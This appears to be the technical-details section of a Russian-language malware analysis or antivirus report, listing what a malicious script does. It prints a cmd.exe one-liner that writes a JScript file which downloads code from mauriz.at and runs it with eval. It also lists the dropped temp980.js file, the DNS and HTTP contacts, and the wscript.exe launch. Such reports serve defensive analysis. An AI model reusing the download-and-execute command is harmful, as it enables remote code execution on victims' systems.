Техническая информация
- '<SYSTEM32>\cmd.exe' /c echo var B="GET"; var H="mauriz.at/term.php?group=doc"; var V=new ActiveXObject("MSXML2.XMLHTTP"); V.open(B,"http://"+H, false); V.send(); var W=V.responseText; eval(""+W+"")>%LOCALAPPDATA%\...
- %LOCALAPPDATA%\temp980.js
- 'ma##iz.at':80
- http://ma##iz.at/term.php?gr#######
- DNS ASK ma##iz.at
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\Temp980.js"